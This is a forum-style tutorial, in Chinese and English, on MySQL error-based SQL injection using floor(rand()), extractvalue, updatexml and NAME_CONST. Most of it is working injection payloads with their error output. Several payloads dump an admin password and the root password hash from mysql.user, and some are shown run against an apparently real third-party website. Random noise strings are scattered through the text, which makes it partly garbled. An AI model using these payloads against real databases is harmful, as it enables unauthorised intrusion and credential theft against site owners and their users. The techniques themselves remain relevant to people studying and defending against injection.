|
1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 举例如下:* K# n. S, y6 Y8 j( y# O
首先进行正常查询: mysql> select * from article where id = 1;
, j3 [: k% b5 R, l8 O+—-+——-+———+& ~0 Y& u/ ~6 Y' O0 o- j3 D1 v$ L
| id | title | content |
' b* J' U! o0 S: n+—-+——-+———+
" ]1 k5 N Z4 M0 ]| 1 | test | do it |6 v) ~: C. s" |3 K6 G* j3 A x
+—-+——-+———+ 假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);3 q$ Q9 d: |, {2 U* c5 @
ERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’ 可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
# X( {) F+ m$ F3 S* q' X例如我们需要查询管理员用户名和密码: Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);$ H$ X7 W) A+ i; K
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
3 P( k) L- g1 {ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ 2、ExtractValue
, O. h8 e: f3 X测试语句如下 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 实际测试过程 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–+ M6 Z" f0 c& c$ }9 _6 H$ i5 b+ T' R
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′ 3、UpdateXml 测试语句 and 1=(updatexml(1,concat(0x3a,(select user())),1)) 实际测试过程 mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’
c5 N5 {5 e z% a, h$ [9 o2 b4 F8 k X& A2 O+ Y% o
再收集: / P! P9 `' K1 g
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c) . w& _8 d* n, x$ ^! ^1 p8 ?7 j
- k- O: b0 ^8 x
Error uplicate column name ‘5.0.27-community-nt’Error uplicate column name ‘5.0.27-community-nt’
) {2 R# _ q& ]0 p, c* X9 n" ~+ X- [' b2 d& {4 |
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)7 N1 X' f5 I* u: U, ^
& Z$ V% }. `( w2 ]
Error uplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Error uplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′ - E- Y; M: s6 A
, `7 k5 T% T* g% k
MYSQL高版本报错注入技巧-利用NAME_CONST注入
5 f4 A" e: j2 |It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
9 ], K, I% F2 G/ s$ ^( n1 N
" Z: u# ^ }5 S) x3 M( j9 q2 ]7 r# a& k' a% y% Y6 ] y8 G
相关信息
6 D% u1 I' B4 ]: d/ O' c) C: M' k# N5 x4 x4 Z4 G, [7 B
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.7 h9 e- e& \* j7 e; M9 C! n
3 Z7 R9 a1 T/ t* u' E
Code:
# z: c4 T1 d2 I" M: \NAME_CONST(DATA, VALUE)
@ Z# ]9 M+ D8 E& \
$ O: N+ Y* J& n3 Z- L4 e& e! NReturns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.3 K/ i3 N2 Q& X* [5 n- m6 J/ A7 Z
# F( I ^+ X kSELECT NAME_CONST('TEST', 1)4 K+ Y. D5 ~, f! k
/ }' F1 e& O J" f7 T1 N# C4 o7 k$ }1 C5 A' P5 o1 l- v; D
/ L: J% q( @3 V) o3 r: m9 M
|---------------|' l f' y" g) v- G* [+ R
| TEST |
( G/ \- c n! I2 ~7 J! y0 U) |. k| |4 r0 C% |9 p+ I
|---------------|
4 Y A' N1 ~- E; [5 `| 1 |
* z- _% W' v b1 @* F| |
" b+ b' c) p9 M$ t4 ]|---------------|
% I% B B$ E& ?6 W9 h! a2 \4 O0 L6 u" `" E3 q
2 n. R& r0 n; |# n0 q9 q. v) @( `; P/ ?) _9 b$ W7 q F7 `* Y$ n
) R3 `' w2 x% p9 t' Qhttp://dev.mysql.com/doc/refman/5.0/en/m...name-const
$ P9 z! c: F+ d$ P' GIntro to MySQL Variables4 i6 H# A6 X, `/ j6 {' C+ c' e
@4 h+ V% v$ {! ?1 uOnce you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.
4 D) ~- s- u4 \6 m4 ^
* |+ V7 H% m5 v* `+ v7 K5 B3 M0 CCode:
4 I, p9 p7 `* j9 Z* shttp://www.baido.hk/qcwh/content ... ;sid=19&cid=261
- }; n6 J9 ]7 S
/ }8 r2 d' i/ o3 v7 K1 {; b4 x. D' ]( V% s. h3 U* D
1 p% g2 i/ A+ k( }4 ~6 ^8 e) \. a6 s1 \% @3 ?$ b' E
( o) O' _' x# k5 a
Code:, W1 E5 n+ m( I4 a- Y% W$ ^8 w4 _
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--
2 U0 s8 K0 A8 k2 G5 e( ~
) \8 J& v9 c/ f. U- S( [
" a* d6 t f+ o* pVAR = Your MySQL variable.
7 l& P- y4 K" u, t6 E3 p# i) G
MySQL 5.1.3 Server System Variables0 B1 [' [" e! g2 v
t2 E+ Q% r ]
Let's try it out on my site..: C: f1 h+ Z4 I$ g( y# H' f/ a$ V8 }. a
6 s6 Q1 a: y w3 o$ oCode:
/ W5 f. t) W% A, P1 B8 N whttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
* d' q0 @* A. z f5 x6 p% X V# j g
Error uplicate column name '5.0.27-community-nt'
4 h6 b0 H. f9 X- J- E
" E+ r1 J) T: @% T6 C
' A, j; R% s& a" C* `) P6 J! p9 N0 f9 i% g- y; Q2 }: m9 @
' a0 E% C6 V4 Y( H) b' ?1 ^3 d% h5 @# Z
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...' z/ K! S: ^8 i! e4 P8 V% l. h
* v9 v) W8 a6 Y+ |! Q: m2 c, ]% F
Data Extraction) z# G4 `9 P5 d' b7 a3 m4 T
( q# R; P8 ^; W; R1 [ @
Code:
8 C9 H( k o: @+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
6 [: E) V; d0 L6 H( t. u, F
6 v7 H- @, R6 y1 e' u* n% o3 S# ]/ G8 e( s9 ~
We should get a duplicate column 1 error...
6 A5 R& R/ u% B5 z% g, h, X: q( a# A8 G4 z& ~2 s& K0 B7 a* b
Code:
: C1 G% R3 @3 p' ohttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--5 V, |, Z' @; u( R. ?9 G+ _) @
- p/ g9 E6 f5 \+ c6 D: hError uplicate column name '1" p$ {* a, P7 V
8 D& w0 M0 e' F0 P/ r) q3 G% U, t8 D8 d! m3 h9 l1 M; g
8 s; b8 r, g, g4 [7 ?) e
2 f& v% M' d" l2 V$ X
& Q T1 [, C' X) \ o) `# l: k# ]) f3 ~9 k5 x
Now let's get the tables out this bitch..9 Z. M, v9 h4 D+ n4 k; g! [
/ E1 |( c8 k6 X; U/ J
Code:# u6 U% Q2 h9 _/ t
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--4 H" m* i7 T2 C4 H! Q
9 Z" M) o5 S! C$ Z% b5 S' Y S9 O4 O" }8 @% X# i# r
Let's see if it works here, if it does, we can go on and finish the job. ~# x4 _* m, u* ?
% v9 a. F4 S9 x" YCode:8 A7 q# ^; n) _7 D5 H$ C3 r
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
0 h+ k) z& ^! w" W+ ]- k, F0 v; w
9 z" S$ f& O) ?3 r8 I9 S! d7 f8 q3 M8 U( _7 T& t+ L
Error uplicate column name 'com_admanage5 J2 m! R$ {# z+ _5 ~# j; l* {
# e8 `3 `( U# \6 P; G. H, j; ?& ?& r$ x* U4 p3 d: X' q
0 v6 P, d j" ^+ c5 ^; q
1 }; U+ x- D: }, R3 D% @
6 w7 o8 k. J5 y( Q
8 Q3 `& e, P1 X# P8 t7 d) c* aNow I'm going to be lazy and use mysql.user as an example, just for the sake of time.
/ ~" s" {, q- P# ]
6 R+ U9 w3 i' e! L" \' s+ eLet's get the columns out of the user table..
. g' e" m7 o" P
) `+ Z" U: G- u& hCode:
0 f; M. k& j: i: \8 |+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--
2 c/ _. d; J2 `$ Z
7 m& Q: f6 W7 F e( D$ R6 F, @ B& W. v2 k; V8 ? o
So mine looks like this, and I get the duplicate column name 'Host'./ ~9 a$ C8 ^! I6 L8 t
/ k) r6 n$ G' P, e3 h* H
Code:
* A' V4 s, t* Shttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
6 D0 V( o* r$ C, B8 [, p( t2 V( ^9 Z3 j
Error uplicate column name 'Host'- O" z3 c6 d C+ K5 B9 _
1 P/ U7 S' G. P2 K* l7 f# V5 x; A2 H& ]2 h( |4 \; U
2 J) H' ]1 A/ }( ^, D8 U* c* ?7 J x9 M1 i! X
1 ?. j" _' \: { j% t3 g: u! V
$ u* _5 U4 u9 v1 v qWoot, time to finish this bitch off.
8 \ d3 u% v h5 v! U3 W
" B# R! ? n! O( M# W% @Code:0 I# y0 z: H) G, t; p: m, c f
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--
( H) B4 ?6 x' |& K7 M# X5 c `0 f
) X+ n3 e' l( s6 s
' U' q: y( s) JSo mine looks like this...
- I4 n! h( Z, a9 \8 X6 R- D
- x9 ]1 S9 k0 r0 |0 eCode: @" w& r9 E4 r! O. P
http://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--
2 ^; \6 N# X% Y3 V% B% a$ {' ?( B1 Q% j, C2 T+ O' c
Error uplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'$ u" x) G( E' K7 [" n4 f
! x/ {3 `. Q0 [+ F& n9 d; r3 w; Y
- X9 {# g/ l* t- ^5 U
$ `0 E; h- n- h, V$ D/ Z& V
9 u. U" l( x6 K% [9 v
2 q5 M5 _4 ]6 o3 v
$ X! i) c& ^; }! \. A& bAnd there we have it, thanks for reading.
, q( _1 t K( o% a) [1 |4 k5 F; |# c+ w0 E4 \
|